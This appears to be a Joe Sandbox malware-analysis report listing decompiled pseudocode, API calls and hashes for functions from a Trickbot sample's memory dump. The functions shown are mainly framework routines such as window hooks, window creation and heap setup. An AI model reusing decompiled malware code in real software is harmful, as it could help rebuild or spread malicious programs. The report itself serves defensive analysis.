                          • Opcode Fuzzy Hash: 634ff82155919c59adbf0de0d4feaa2c6d5cc4625fdd2e30a239f961e6f0c57b
                          • Instruction Fuzzy Hash: ABF0A9709043109FD710EF65C440A0A7BE8AF48710F05948FF4848B3A2CBB8EA40CB9A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041DA3F(void* __esi, struct HINSTANCE__* _a4, intOrPtr _a8) {
                          				char _v264;
                          				void* __ebp;
                          				long _t12;
                          				void* _t22;
                          
                          				GetModuleFileNameA(_a4,  &_v264, 0x104);
                          				_t12 = GetShortPathNameA( &_v264, E004181F7(_a8, _t22, 0x104), 0x104); // executed
                          				_t23 = _t12;
                          				if(_t12 == 0) {
                          					E00418005(_a8,  &_v264);
                          				}
                          				return E00418246(_a8, _t23, 0xffffffff);
                          			}

                          Instruction addresses (disassembly column only; instruction text not extracted): 0x0041da59, 0x0041da71, 0x0041da77, 0x0041da7a, 0x0041da86, 0x0041da86, 0x0041da96

                          APIs
                          • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0041DA59
                          • GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 0041DA71
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Name$FileModulePathShort
                          • String ID:
                          • API String ID: 4073693819-0
                          • Opcode ID: b9f54783031963a94c2d05d7bb1f4424fcbd7a89438525dc67f6f7c8010c0e0f
                          • Instruction ID: c2ebb156cba56f0b6d65d89b5853084983842b5ba43459aea1822a54a42a79e3
                          • Opcode Fuzzy Hash: b9f54783031963a94c2d05d7bb1f4424fcbd7a89438525dc67f6f7c8010c0e0f
                          • Instruction Fuzzy Hash: 33F0A7B64000187BCB10EF51CCC4DDF376C9F05364F004166BA55D2190CE749AC4CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E0041C021() {
                          				void* _t6;
                          				void* _t7;
                          				struct HHOOK__* _t9;
                          				void* _t18;
                          
                          				_t6 = E00432562();
                          				if( *((char*)(_t6 + 0x14)) == 0) {
                          					_t7 = E00432335();
                          					_t9 = SetWindowsHookExA(0xffffffff, E0041C379, 0, GetCurrentThreadId()); // executed
                          					_push(E0043056B);
                          					 *(_t7 + 0x30) = _t9;
                          					_t18 = E00432DE3(0x44b4d8);
                          					if( *((intOrPtr*)(_t18 + 0x14)) != 0) {
                          						 *((intOrPtr*)(_t18 + 0x14))( *((intOrPtr*)(E00432562() + 8)));
                          					}
                          					return E00432D4E(0x44b4d4, E00431B7D);
                          				}
                          				return _t6;
                          			}

                          Instruction addresses (disassembly column only; instruction text not extracted): 0x0041c021, 0x0041c02a, 0x0041c02d, 0x0041c044, 0x0041c04a, 0x0041c054, 0x0041c05c, 0x0041c062, 0x0041c06c, 0x0041c06c, 0x00000000, 0x0041c07e, 0x0041c07f

                          APIs
                          • GetCurrentThreadId.KERNEL32(?,00433BB2,00000000,?,00413D3C,00000000,00000000,00000000,00000000,00405287,00000000), ref: 0041C034
                          • SetWindowsHookExA.USER32(000000FF,0041C379,00000000,00000000), ref: 0041C044
                            • Part of subcall function 00432DE3: __EH_prolog.LIBCMT ref: 00432DE8
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CurrentH_prologHookThreadWindows
                          • String ID:
                          • API String ID: 2183259885-0
                          • Opcode ID: 64520f0e3fb44fc85b4c7eb34fd13ba60e6c7669913ab76fc2623c2900d1d870
                          • Instruction ID: 9462778055dcf9d82bb265586a91095737fdd4a16b4e3bdb60d39efc2548aa20
                          • Opcode Fuzzy Hash: 64520f0e3fb44fc85b4c7eb34fd13ba60e6c7669913ab76fc2623c2900d1d870
                          • Instruction Fuzzy Hash: 47F0A0318807107AE7247BB09E0DB6D3A909F0C754F14325FB512AA1E2CBAC9D80879D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004190CA(intOrPtr* __ecx, int _a4, int _a8, long _a12) {
                          				_Unknown_base(*)()* _t11;
                          				long _t12;
                          				intOrPtr* _t17;
                          
                          				_t17 = __ecx;
                          				_t11 =  *(__ecx + 0x28);
                          				if(_t11 != 0) {
                          					L3:
                          					_t12 = CallWindowProcA(_t11,  *(_t17 + 0x1c), _a4, _a8, _a12); // executed
                          					return _t12;
                          				}
                          				_t11 =  *( *((intOrPtr*)( *__ecx + 0x80))());
                          				if(_t11 != 0) {
                          					goto L3;
                          				}
                          				return DefWindowProcA( *(__ecx + 0x1c), _a4, _a8, _a12);
                          			}

                          Instruction addresses (disassembly column only; instruction text not extracted): 0x004190ce, 0x004190d0, 0x004190d5, 0x004190f9, 0x00419106, 0x00000000, 0x00419106, 0x004190df, 0x004190e3, 0x00000000, 0x00000000, 0x00000000

                          APIs
                          • DefWindowProcA.USER32(?,?,?,?), ref: 004190F1
                          • CallWindowProcA.USER32(?,?,?,?,?), ref: 00419106
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ProcWindow$Call
                          • String ID:
                          • API String ID: 2316559721-0
                          • Opcode ID: d1c9fe6cb2fb7f8f18b748616b0adcb3f8bdc8cace415b80df30f0d7d92a3749
                          • Instruction ID: 76daa847bd17bf4e338bbadd7040889ba36f34da90edf34246a0ed93101e2099
                          • Opcode Fuzzy Hash: d1c9fe6cb2fb7f8f18b748616b0adcb3f8bdc8cace415b80df30f0d7d92a3749
                          • Instruction Fuzzy Hash: 44F09236100209FFDF229F95EC48D9A7FB9FF08350B04846AFA5586121D772D9A0AF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00418D00(void* __ebp) {
                          				intOrPtr _v0;
                          				struct HHOOK__* _t6;
                          				intOrPtr _t9;
                          				struct HHOOK__* _t10;
                          
                          				_t6 = E00432D4E(0x44b2ec, E00430506);
                          				_t10 = _t6;
                          				_t9 = _v0;
                          				if( *((intOrPtr*)(_t10 + 0x14)) == _t9) {
                          					return _t6;
                          				}
                          				if( *(_t10 + 0x2c) == 0) {
                          					_t6 = SetWindowsHookExA(5, E00418B0A, 0, GetCurrentThreadId()); // executed
                          					 *(_t10 + 0x2c) = _t6;
                          					if(_t6 == 0) {
                          						_t6 = E0041564B(0x44b2ec);
                          					}
                          				}
                          				 *((intOrPtr*)(_t10 + 0x14)) = _t9;
                          				return _t6;
                          			}

                          Instruction addresses (disassembly column only; instruction text not extracted): 0x00418d0c, 0x00418d11, 0x00418d13, 0x00418d1a, 0x00418d49, 0x00418d49, 0x00418d20, 0x00418d32, 0x00418d3a, 0x00418d3d, 0x00418d3f, 0x00418d3f, 0x00418d3d, 0x00418d44, 0x00000000

                          APIs
                            • Part of subcall function 00432D4E: TlsGetValue.KERNEL32(0044B4A0,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000,?,00413D3C,00000000,00000000,00000000,00000000), ref: 00432D8D
                          • GetCurrentThreadId.KERNEL32(Function_00030506,?,?,00418E08), ref: 00418D22
                          • SetWindowsHookExA.USER32(00000005,Function_00018B0A,00000000,00000000), ref: 00418D32
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CurrentHookThreadValueWindows
                          • String ID:
                          • API String ID: 933525246-0
                          • Opcode ID: d1136e87f226ddec6b263baa8e2990c34332d1232755c2a598aeefaa31318c5c
                          • Instruction ID: a66463dc830444ebe8435426098a80fba26ef64b7f9df52c3a0b8baa7f6eb943
                          • Opcode Fuzzy Hash: d1136e87f226ddec6b263baa8e2990c34332d1232755c2a598aeefaa31318c5c
                          • Instruction Fuzzy Hash: 7EE09B71601700AFD3309F52ED05B5777E5DB94712F10552FF14585580DB749881CF6D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040815F(intOrPtr _a4) {
                          				void* _t6;
                          				void* _t9;
                          
                          				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                          				 *0x44d0bc = _t6;
                          				if(_t6 == 0) {
                          					L3:
                          					return 0;
                          				} else {
                          					if(E0040819B() != 0) {
                          						_t9 = 1;
                          						return _t9;
                          					} else {
                          						HeapDestroy( *0x44d0bc);
                          						goto L3;
                          					}
                          				}
                          			}

                          Instruction addresses (disassembly column only; instruction text not extracted): 0x00408170, 0x00408178, 0x0040817d, 0x00408194, 0x00408196, 0x0040817f, 0x00408186, 0x00408199, 0x0040819a, 0x00408188, 0x0040818e, 0x00000000, 0x0040818e, 0x00408186

                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,00405205,00000001), ref: 00408170
                            • Part of subcall function 0040819B: HeapAlloc.KERNEL32(00000000,00000140,00408184), ref: 004081A8
                          • HeapDestroy.KERNEL32 ref: 0040818E
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Heap$AllocCreateDestroy
                          • String ID:
                          • API String ID: 2236781399-0
                          • Opcode ID: 968265180b5e53915b965500d779458747a6f36c005ce43ade8de0eb86e1fc80
                          • Instruction ID: 3bbf16bb50bd95cb4f1ac5c7854d34f4ad95e20ff08daeb615483b1b8e28411a
                          • Opcode Fuzzy Hash: 968265180b5e53915b965500d779458747a6f36c005ce43ade8de0eb86e1fc80
                          • Instruction Fuzzy Hash: 63E0C2746183029AEF100F30AD0876639D49F40386F00443EB585D90E4EBB488429A1D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E0042192F(intOrPtr* __ecx) {
                          				signed int _t64;
                          				void* _t69;
                          				intOrPtr* _t72;
                          				signed int _t74;
                          				signed int _t88;
                          				signed int _t92;
                          				signed int _t101;
                          				void* _t102;
                          				intOrPtr* _t106;
                          				intOrPtr* _t125;
                          				intOrPtr* _t128;
                          				intOrPtr* _t131;
                          				void* _t133;
                          
                          				E00405340(E004382E0, _t133);
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t128 = __ecx;
                          				_t101 = 0;
                          				_t131 =  *((intOrPtr*)(__ecx + 0x64));
                          				 *(_t133 - 0x10) = 0;
                          				 *((intOrPtr*)(_t133 - 0x14)) = 0;
                          				if(_t131 == 0) {
                          					_t106 = __ecx;
                          					_t131 =  *((intOrPtr*)( *__ecx + 0x6c))();
                          					 *((intOrPtr*)(_t133 - 0x14)) = 1;
                          					L4:
                          					_t138 = _t131 - _t101;
                          					if(_t131 != _t101) {
                          						__eflags =  *(_t133 - 0x10) - _t101;
                          						if( *(_t133 - 0x10) != _t101) {
                          							L10:
                          							__eflags =  *((intOrPtr*)(_t133 + 8)) - _t101;
                          							if( *((intOrPtr*)(_t133 + 8)) != _t101) {
                          								E00432562();
                          								E0041BB22();
                          								 *(_t133 - 4) = _t101;
                          								_t102 =  *((intOrPtr*)( *_t131 + 0x58))();
                          								 *((intOrPtr*)( *_t131 + 0x5c))(0);
                          								_t64 =  *((intOrPtr*)( *_t131 + 0x74))( *((intOrPtr*)(_t133 + 8)));
                          								__eflags = _t64;
                          								if(_t64 != 0) {
                          									 *((intOrPtr*)( *_t131 + 0x54))( *((intOrPtr*)(_t133 + 8)), 1);
                          									 *(_t133 - 4) =  *(_t133 - 4) | 0xffffffff;
                          									E00432562();
                          									E0041BB37();
                          									_t101 = 0;
                          									__eflags = 0;
                          									L25:
                          									_t69 = E0041C00C();
                          									__eflags =  *((intOrPtr*)(_t133 - 0x14)) - _t101;
                          									if( *((intOrPtr*)(_t133 - 0x14)) != _t101) {
                          										__eflags =  *(_t69 + 0x1c) - _t101;
                          										if( *(_t69 + 0x1c) == _t101) {
                          											 *(_t69 + 0x1c) =  *(_t133 - 0x10);
                          										}
                          									}
                          									 *((intOrPtr*)( *_t128 + 0x74))( *(_t133 - 0x10), _t131,  *((intOrPtr*)(_t133 + 0xc)));
                          									_t72 = _t131;
                          									L29:
                          									 *[fs:0x0] =  *((intOrPtr*)(_t133 - 0xc));
                          									return _t72;
                          								}
                          								__eflags =  *((intOrPtr*)(_t133 - 0x14)) - _t64;
                          								if( *((intOrPtr*)(_t133 - 0x14)) == _t64) {
                          									_t74 =  *((intOrPtr*)( *_t131 + 0x58))();
                          									__eflags = _t74;
                          									if(_t74 != 0) {
                          										 *((intOrPtr*)( *_t128 + 0x84))(_t131);
                          										 *((intOrPtr*)( *_t131 + 0x70))();
                          									} else {
                          										 *((intOrPtr*)( *_t131 + 0x5c))(_t102);
                          									}
                          								} else {
                          									 *((intOrPtr*)( *( *(_t133 - 0x10)) + 0x58))();
                          								}
                          								_t37 = _t133 - 4;
                          								 *_t37 =  *(_t133 - 4) | 0xffffffff;
                          								__eflags =  *_t37;
                          								E00432562();
                          								E0041BB37();
                          								L23:
                          								_t72 = 0;
                          								goto L29;
                          							}
                          							 *((intOrPtr*)( *_t128 + 0x84))(_t131);
                          							__eflags =  *((intOrPtr*)(_t133 + 0xc)) - _t101;
                          							if( *((intOrPtr*)(_t133 + 0xc)) == _t101) {
                          								 *((intOrPtr*)(_t131 + 0x4c)) = 1;
                          							}
                          							_t88 =  *((intOrPtr*)( *_t131 + 0x70))();
                          							__eflags = _t88;
                          							if(_t88 != 0) {
                          								goto L25;
                          							} else {
                          								__eflags =  *((intOrPtr*)(_t133 - 0x14)) - _t101;
                          								if( *((intOrPtr*)(_t133 - 0x14)) != _t101) {
                          									 *((intOrPtr*)( *( *(_t133 - 0x10)) + 0x58))();
                          								}
                          								goto L23;
                          							}
                          						}
                          						 *(_t131 + 0x48) =  *(_t131 + 0x48) & 0x00000000;
                          						_t125 = _t128; // executed
                          						_t92 =  *((intOrPtr*)( *_t128 + 0x70))(_t131, 0);
                          						__eflags = _t92;
                          						 *(_t133 - 0x10) = _t92;
                          						if(__eflags != 0) {
                          							_t101 = 0;
                          							__eflags = 0;
                          							goto L10;
                          						}
                          						E00428683(_t125, __eflags);
                          						 *((intOrPtr*)( *_t131 + 4))(1, 0xf104, _t92, 0xffffffff);
                          						goto L23;
                          					}
                          					_push(0xffffffff);
                          					_push(_t101);
                          					_push(0xf104);
                          					E00428683(_t106, _t138);
                          					goto L23;
                          				}
                          				_t106 = _t131;
                          				if( *((intOrPtr*)( *_t131 + 0x90))() == 0) {
                          					goto L23;
                          				} else {
                          					 *(_t133 - 0x10) = E004041A9();
                          					goto L4;
                          				}
                          			}

                          Instruction addresses (disassembly column only; instruction text not extracted): 0x00421934, 0x00421939, 0x0042193a, 0x0042193e, 0x00421940, 0x00421942, 0x00421945, 0x0042194a, 0x0042194d, 0x0042196d, 0x00421972, 0x00421974, 0x0042197b, 0x0042197b, 0x0042197d, 0x00421991, 0x00421994, 0x004219ce, 0x004219ce, 0x004219d1, 0x00421a0c, 0x00421a14, 0x00421a1d, 0x00421a23, 0x00421a2b, 0x00421a35, 0x00421a38, 0x00421a3a, 0x00421a90, 0x00421a93, 0x00421a97, 0x00421a9f, 0x00421aa4, 0x00421aa4, 0x00421aa6, 0x00421aa6, 0x00421aab, 0x00421aae, 0x00421ab0, 0x00421ab3, 0x00421ab8, 0x00421ab8, 0x00421ab3, 0x00421ac6, 0x00421ac9, 0x00421acb, 0x00421ad1, 0x00421ad9, 0x00421ad9, 0x00421a3c, 0x00421a3f, 0x00421a4f, 0x00421a52, 0x00421a54, 0x00421a65, 0x00421a6f, 0x00421a56, 0x00421a5b, 0x00421a5b, 0x00421a41, 0x00421a46, 0x00421a46, 0x00421a72, 0x00421a72, 0x00421a72, 0x00421a76, 0x00421a7e, 0x00421a83, 0x00421a83, 0x00000000, 0x00421a83, 0x004219d8, 0x004219de, 0x004219e1, 0x004219e3, 0x004219e3, 0x004219ee, 0x004219f1, 0x004219f3, 0x00000000, 0x004219f9, 0x004219f9, 0x004219fc, 0x00421a07, 0x00421a07, 0x00000000, 0x004219fc, 0x004219f3, 0x00421999, 0x004219a2, 0x004219a4, 0x004219a7, 0x004219a9, 0x004219af, 0x004219cc, 0x004219cc, 0x00000000, 0x004219cc, 0x004219b9, 0x004219c4, 0x00000000, 0x004219c4, 0x0042197f, 0x00421981, 0x00421982, 0x00421987, 0x00000000, 0x00421987, 0x00421951, 0x0042195b, 0x00000000, 0x00421961, 0x00421966, 0x00000000, 0x00421966

                          APIs
                          • __EH_prolog.LIBCMT ref: 00421934
                            • Part of subcall function 00428683: __EH_prolog.LIBCMT ref: 00428688
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 10727856885482daadd3d031189a0a57ab7738776291a269f3ea5458fab1d072
                          • Instruction ID: aec43840b8fe7224f0192343ac1368ee1e66e74183b0c6a46887e69fdc5b0869
                          • Opcode Fuzzy Hash: 10727856885482daadd3d031189a0a57ab7738776291a269f3ea5458fab1d072
                          • Instruction Fuzzy Hash: C0519D70701221DFCB24EF65C498A6EBBB1FF58314B11416EE5529B3A1CB789E81CF85
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041868C(void* __edx) {
                          				void* _t37;
                          				void* _t43;
                          				intOrPtr _t52;
                          				signed int _t55;
                          				signed int _t59;
                          				intOrPtr* _t62;
                          				void* _t63;
                          				signed int _t68;
                          				intOrPtr _t75;
                          				void* _t78;
                          				void* _t80;
                          
                          				_t63 = __edx;
                          				E00405340(E004377B8, _t78);
                          				 *((intOrPtr*)(_t78 - 0x10)) = _t80 - 0x34;
                          				_t52 = E00432D4E(0x44b2ec, E00430506);
                          				_t55 = 7;
                          				_t3 = _t52 + 0x34; // 0x34
                          				 *(_t78 - 4) =  *(_t78 - 4) & 0x00000000;
                          				 *((intOrPtr*)(_t78 - 0x14)) = _t52;
                          				_t37 = memcpy(_t78 - 0x40, _t3, _t55 << 2);
                          				_t75 =  *((intOrPtr*)(_t78 + 0x10));
                          				_t68 =  *(_t78 + 8);
                          				 *_t37 =  *(_t78 + 0xc);
                          				 *((intOrPtr*)(_t52 + 0x3c)) =  *((intOrPtr*)(_t78 + 0x14));
                          				 *((intOrPtr*)(_t52 + 0x38)) = _t75;
                          				 *((intOrPtr*)(_t52 + 0x40)) =  *((intOrPtr*)(_t78 + 0x18));
                          				if(_t75 == 2) {
                          					_t62 =  *((intOrPtr*)(_t68 + 0x34));
                          					if(_t62 != 0) {
                          						 *((intOrPtr*)( *_t62 + 0x5c))(0);
                          					}
                          				}
                          				 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                          				if(_t75 == 0x110) {
                          					E00418519(_t68, _t78 - 0x24, _t78 + 8);
                          				}
                          				 *((intOrPtr*)(_t78 + 0x18)) =  *((intOrPtr*)( *_t68 + 0x98))(_t75,  *((intOrPtr*)(_t78 + 0x14)),  *((intOrPtr*)(_t78 + 0x18)));
                          				if(_t75 == 0x110) {
                          					E0041853C(_t63, _t68, _t78 - 0x24,  *(_t78 + 8));
                          				}
                          				_t29 = _t52 + 0x34; // 0x34
                          				_t59 = 7;
                          				_t43 = memcpy(_t29, _t78 - 0x40, _t59 << 2);
                          				 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0xc));
                          				return _t43;
                          			}
                          0x0041868c
                          0x00418691
                          0x004186a1
                          0x004186ae
                          0x004186b2
                          0x004186b6
                          0x004186b9
                          0x004186bf
                          0x004186c2
                          0x004186c7
                          0x004186ca
                          0x004186cd
                          0x004186d5
                          0x004186db
                          0x004186de
                          0x004186e1
                          0x004186e3
                          0x004186e8
                          0x004186ee
                          0x004186ee
                          0x004186e8
                          0x004186f1
                          0x004186fb
                          0x00418706
                          0x00418706
                          0x00418722
                          0x00418725
                          0x0041872f
                          0x0041872f
                          0x00418765
                          0x00418768
                          0x0041876c
                          0x00418773
                          0x0041877c

                          APIs
                          • __EH_prolog.LIBCMT ref: 00418691
                            • Part of subcall function 00432D4E: TlsGetValue.KERNEL32(0044B4A0,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000,?,00413D3C,00000000,00000000,00000000,00000000), ref: 00432D8D
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prologValue
                          • String ID:
                          • API String ID: 3700342317-0
                          • Opcode ID: 03b23b424f1eef43ace060ad27b7a6110b5d970d4799c741caca17ef366c87f3
                          • Instruction ID: 0bd7cddfc2eb3fa599fbe5144d780db0330a5adcf4b7bcad7e5349bdc5847d3b
                          • Opcode Fuzzy Hash: 03b23b424f1eef43ace060ad27b7a6110b5d970d4799c741caca17ef366c87f3
                          • Instruction Fuzzy Hash: E5214872A00209EFDB05DF54C981AEE7BB9FB48354F10406AF905AB281D774AE90CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E00418D8E(intOrPtr* __ecx, long _a4, CHAR* _a8, CHAR* _a12, long _a16, int _a20, int _a24, int _a28, int _a32, struct HWND__* _a36, struct HMENU__* _a40, void* _a44) {
                          				long _v8;
                          				CHAR* _v12;
                          				CHAR* _v16;
                          				long _v20;
                          				int _v24;
                          				int _v28;
                          				int _v32;
                          				int _v36;
                          				struct HWND__* _v40;
                          				struct HMENU__* _v44;
                          				struct HINSTANCE__* _v48;
                          				void* _v52;
                          				void* __ebp;
                          				struct HWND__* _t59;
                          				struct HWND__* _t74;
                          				intOrPtr* _t76;
                          				void* _t77;
                          
                          				_v8 = _a4;
                          				_v12 = _a8;
                          				_v16 = _a12;
                          				_v20 = _a16;
                          				_v24 = _a20;
                          				_v28 = _a24;
                          				_v32 = _a28;
                          				_v36 = _a32;
                          				_v40 = _a36;
                          				_t76 = __ecx;
                          				_v44 = _a40;
                          				_v48 =  *((intOrPtr*)(E00432562() + 8));
                          				_v52 = _a44;
                          				_push( &_v52);
                          				if( *((intOrPtr*)( *_t76 + 0x5c))() != 0) {
                          					E00418D00(_t77, _t76);
                          					_t59 = CreateWindowExA(_v8, _v12, _v16, _v20, _v24, _v28, _v32, _v36, _v40, _v44, _v48, _v52); // executed
                          					_t74 = _t59;
                          					if(E00418D4C() == 0) {
                          						 *((intOrPtr*)( *_t76 + 0xa4))();
                          					}
                          					return 0 | _t74 != 0x00000000;
                          				}
                          				 *((intOrPtr*)( *_t76 + 0xa4))();
                          				return 0;
                          			}
                          0x00418d98
                          0x00418d9e
                          0x00418da4
                          0x00418daa
                          0x00418db0
                          0x00418db6
                          0x00418dbc
                          0x00418dc2
                          0x00418dc8
                          0x00418dce
                          0x00418dd0
                          0x00418dde
                          0x00418de4
                          0x00418de9
                          0x00418df1
                          0x00418e03
                          0x00418e2c
                          0x00418e32
                          0x00418e3b
                          0x00418e41
                          0x00418e41
                          0x00000000
                          0x00418e4e
                          0x00418df7
                          0x00000000

                          APIs
                          • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00418E2C
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CreateWindow
                          • String ID:
                          • API String ID: 716092398-0
                          • Opcode ID: 9128e1a21bede23b692c54286ac151f026e8d1e10508c372e1cc72b4f43bce75
                          • Instruction ID: 00bd25db292df92e4312f8edc2925c12ce9c82f3169ed723797dc74e51acd5e3
                          • Opcode Fuzzy Hash: 9128e1a21bede23b692c54286ac151f026e8d1e10508c372e1cc72b4f43bce75
                          • Instruction Fuzzy Hash: 67319D75A00219AFCF01DFA8C944ADEBBF1BF4C304F11446AF918E7210E7359A519F94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E0042B58B(void* __ecx) {
                          				intOrPtr _t25;
                          				void* _t27;
                          				void* _t29;
                          				signed int _t32;
                          				void* _t49;
                          
                          				E00405340(E00438A20, _t49);
                          				_t25 =  *((intOrPtr*)(__ecx + 0x10));
                          				_t54 = _t25;
                          				if(_t25 != 0) {
                          					__eflags = _t25 - 1;
                          					_t32 =  *( *((intOrPtr*)(__ecx + 8)) + 8);
                          					if(_t25 <= 1) {
                          						L5:
                          						_t27 =  *((intOrPtr*)( *_t32 + 0x80))(0, 1);
                          					} else {
                          						E00417799(_t49 - 0x70, 0x7801, 0);
                          						 *(_t49 - 0x10) =  *(_t49 - 0x10) & 0x00000000;
                          						 *((intOrPtr*)(_t49 - 0x70)) = 0x43e218;
                          						 *((intOrPtr*)(_t49 - 0x14)) = __ecx + 4;
                          						 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
                          						_t29 = E0041784E(_t49 - 0x70);
                          						__eflags = _t29 - 1;
                          						if(_t29 != 1) {
                          							 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
                          							 *((intOrPtr*)(_t49 - 0x70)) = 0x43e218;
                          							_t27 = E00417440(_t49 - 0x70);
                          						} else {
                          							_t32 =  *(_t49 - 0x10);
                          							_t13 = _t49 - 4;
                          							 *_t13 =  *(_t49 - 4) | 0xffffffff;
                          							__eflags =  *_t13;
                          							 *((intOrPtr*)(_t49 - 0x70)) = 0x43e218;
                          							E00417440(_t49 - 0x70);
                          							goto L5;
                          						}
                          					}
                          				} else {
                          					_push(0xffffffff);
                          					_push(_t25);
                          					_push(0xf104);
                          					_t27 = E00428683(__ecx, _t54);
                          				}
                          				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
                          				return _t27;
                          			}
                          0x0042b590
                          0x0042b59d
                          0x0042b5a0
                          0x0042b5a2
                          0x0042b5b6
                          0x0042b5b9
                          0x0042b5bc
                          0x0042b602
                          0x0042b60a
                          0x0042b5be
                          0x0042b5c8
                          0x0042b5cd
                          0x0042b5d9
                          0x0042b5dc
                          0x0042b5df
                          0x0042b5e6
                          0x0042b5eb
                          0x0042b5ee
